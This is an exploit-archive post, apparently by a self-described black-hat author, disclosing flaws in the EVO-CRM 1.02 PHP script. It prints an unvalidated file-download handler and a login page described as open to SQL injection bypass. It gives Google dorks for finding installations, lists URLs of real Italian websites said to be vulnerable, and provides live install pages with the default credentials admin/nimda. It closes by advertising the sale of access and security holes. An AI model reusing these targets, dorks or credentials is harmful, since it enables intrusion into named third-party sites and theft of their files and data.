EVO-CRM Script Multi Vulnerability

2020.03.14
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

/*********************************************************************************** ** Exploit Title: EVO-CRM Script Multi Vulnerability ** ** Exploit Author: Milad Hacking ** ** Vendor Homepage : http://www.operagrafica.it/ ** ** Version: 1.02 ** ** Google Dork 1 : intext:"Sito web realizzato da OperaGrafica" ** ** Google Dork 2 : inurl:"contatti.htm" intext:"Dopo aver preso visione" ** ** Date: 2020-03-13 ** ** Tested on: Windows/ Mozilla Firefox ** *********************************************************************************** ** Demo Vulnerability LFD : https://www.tvmoving.it//download.php?nome_file=download.php http://www.lacollinadelgirasole.it/download.php?nome_file=download.php http://cafinv.eu/download.php?nome_file=download.php https://www.frasipercaso.it/download.php?nome_file=download.php https://www.logistics4you.express/download.php?nome_file=download.php https://www.scattolini.it/download.php?nome_file=download.php http://aestetika.it/download.php?nome_file=download.php http://www.lacollinadelgirasole.it/download.php?nome_file=download.php *********************************************************************************** *********************************************************************************** ** Vulnerability Code Local File Download : <?php $nome_file = $_GET['nome_file']; $dimensione_file = filesize($nome_file); header("Content-type: Application/octet-stream"); header("Content-Disposition: attachment; filename=".basename($nome_file)); header("Content-Description: Download PHP"); header("Content-Length: $dimensione_file"); readfile($nome_file); ?> *********************************************************************************** ** Demo Vulnerability Bypass Login Page With Method Post To Sql Injection : https://www.tvmoving.it//riservato/index.php http://www.lacollinadelgirasole.it/riservato/index.php http://cafinv.eu/riservato/index.php https://www.frasipercaso.it/riservato/index.php https://www.logistics4you.express/riservato/index.php https://www.scattolini.it/riservato/index.php http://aestetika.it/riservato/index.php http://www.lacollinadelgirasole.it/riservato/index.php *********************************************************************************** *********************************************************************************** ** Vulnerability Code Sql Injection : <?php define('ACCESS', 'public'); define('RELATIVE_PATH', "../"); require_once(RELATIVE_PATH.'include/application_top.php'); ?> <!DOCTYPE html> <html lang="en"> <head> <?php include_once("header_top.php");?> </head> <body> <div id="caricamento" style="height:100%; top:0px;"></div> <div class="container-fluid"> <div class="row-fluid"> <div class="row-fluid"> <div class="span12 center"> <img src="img/operagrafica.jpg" alt="<?=constant(strtoupper("GENERALI_"._NOME_SITO))?>" /> <h2>Accesso riservato <?=constant(strtoupper("GENERALI_"._NOME_SITO))?></h2> </div><!--/span--> </div><!--/row--> <div class="row-fluid"> <div class="well span5 center login-box"> <div class="alert alert-info"> Inserite un utente con credenziali valide per accedere al pannello di amministrazione. </div> <form class="form-horizontal" action="<?=_ABSOLUTE_PATH?><?=_MODULI?>utente/login.php" method="post"> <fieldset> <div class="input-prepend" title="Inserisci la tua login" data-rel="tooltip_input"> <span class="add-on"><i class="icon-user"></i></span><input autofocus class="input-medium" name="login" id="username" type="text" value="" /> </div> <div class="clearfix"></div> <div class="input-prepend" title="Inserisci la tua password" data-rel="tooltip_input"> <span class="add-on"><i class="icon-lock"></i></span><input class="input-medium" name="password" id="password" type="password" value="" /> </div> <div class="clearfix"></div> <!-- <div class="input-prepend"> <label class="remember" for="remember"><input type="checkbox" id="remember" />Remember me</label> </div> <div class="clearfix"></div> --> <input name="loginsubmit" type="hidden" value="Invia" /> <p class="center span5"> <button type="submit" class="btn btn-primary">Login</button> </p> </fieldset> </form> </div><!--/span--> </div><!--/row--> <div class="row-fluid"> <div class="well span5 center"> <p>Password dimenticata? </p> <a style="margin-left:-10px;" href="richiedi_password.php" class="btn"><i class="icon-download"></i> Richiedi nuova password</a> </div><!--/span--> </div><!--/row--> </div><!--/fluid-row--> <div class="row-fluid"> <div class="span5 center"> <?=constant(strtoupper("GENERALI_"._NOME_SITO))?> </div><!--/span--> </div><!--/row--> </div><!--/.fluid-container--> <?php include_once("footer_js.php");?> </body> </html> *********************************************************************************** ** Demo Vulnerability Default Password : http://www.lemstrumenti.it/include/install/index.php https://www.e-volving.it/include/install/index.php http://www.autmarconi.it/include/install/index.php Information : Username: admin Password: nimda *********************************************************************************** ** Special thanks to: Iliya Norton , Vahid Elmi , Mahsa Black , Mahdi c0c01n, Nazila Black-hat , Mahsa Black , MSAmiee , Ahawz Hackerz , AliHack051 , Ahor4 *********************************************************************************** Sell Access And Security Holes https://fullsec.org https://telegram.me/Milad_Hacking Https://telegram.me/TheHackings http://instagram.com/Milad.Hacking milad.hacking.blackhat@Gmail.com ***********************************************************************************


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top